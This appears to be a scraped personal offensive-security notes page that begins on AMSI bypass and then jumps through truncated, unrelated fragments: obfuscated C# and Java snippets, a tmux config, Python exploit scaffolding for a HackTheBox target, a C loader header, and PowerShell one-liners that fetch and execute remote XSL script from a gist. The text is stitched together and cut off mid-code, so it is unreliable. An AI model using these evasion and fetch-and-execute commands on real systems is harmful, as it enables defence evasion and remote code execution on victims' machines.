sharpicx

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

	import java.util.Base64;
	import java.security.MessageDigest;
	import javax.crypto.Cipher;
	import javax.crypto.spec.IvParameterSpec;
	import javax.crypto.spec.SecretKeySpec;
	import java.util.HexFormat;

	class Main {
	public static byte[] f44153a = {104, 51, 94, 37, 52, 126, 115, 120, 106, 108, 115, 100, 57, 49};

	using System;
	using System.Text;

	public class HelloWorld
	{
	public static void Main(string[] args)
	{
	string banner = "lIlIlIIIlIIllIlIlIIlIIlllIIlllIIlIIlIIIIlIIlIIlIlIIllIlIllIllllllIIIlIlllIIlIIIIllIllllllIlIllIIlIIlIllIlIIlIIlIlIIIlllllIIlIIlllIIlIllIlIIllIIllIIlIllIlIIllIlIlIIllIllllIllllllIllllIIlIIIllIllIIllllIlIIIIlIllIIIIllIlIIlllIIlIIIllIllIIllllIlIIlllIIlIIlIlIIlIllIIlIlIIllIlIllIllllI";
	string pleaseEnterThePasswordKey = "lIlIlllllIIlIIlllIIllIlIlIIllllIlIIIllIIlIIllIlIllIllllllIIllIlIlIIlIIIllIIIlIlllIIllIlIlIIIllIlllIllllllIIIlIlllIIlIllllIIllIlIllIllllllIlIlllllIIllllIlIIIllIIlIIIllIIlIIIlIIIlIIlIIIIlIIIllIllIIllIllllIllllllIllIlIIlIIllIlIlIIIIllIllIIIlIlllIlllll";
	string winString = "lIlIlIIIlIllIllIlIllIIIl";

	using System;
	using System.ComponentModel;
	using System.Drawing;
	using System.IO;
	using System.Security.Cryptography;
	using System.Text;

	public class HelloWorld
	{
	public static void Main(string[] args)

	set -g default-terminal "screen-256color"
	setw -g xterm-keys on
	set -s escape-time 10
	set -sg repeat-time 600
	set -s focus-events on

	unbind C-b
	set -g prefix C-a

	set-option -g repeat-time 0

	import requests
	import string
	import time
	from requests.exceptions import ConnectionError
	from pwn import log

	ext = ""
	i = 1
	while True:
	try:

	import requests
	import readline
	from requests_toolbelt.multipart.encoder import MultipartEncoder

	def print_colored(text, color_code):
	print(f"\033[{color_code}m{text}\033[0m")

	def upload():
	login_url = "http://greenhorn.htb/login.php"
	upload_url = "http://greenhorn.htb/admin.php?action=installmodule"

	#include <Windows.h>
	#include <Psapi.h>
	#include <metahost.h>
	#include <comutil.h>
	#include <mscoree.h>
	#include "patch_info.h"
	#include "base\helpers.h"

	/**
	* For the debug build we want:

	import random
	import sys

	from OpenSSL import crypto
	from pathlib import Path
	from ssl import get_server_certificate
	from subprocess import call, PIPE
	from os import system
	from random import randrange, randint, uniform, shuffle, SystemRandom
	from string import ascii_letters

	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]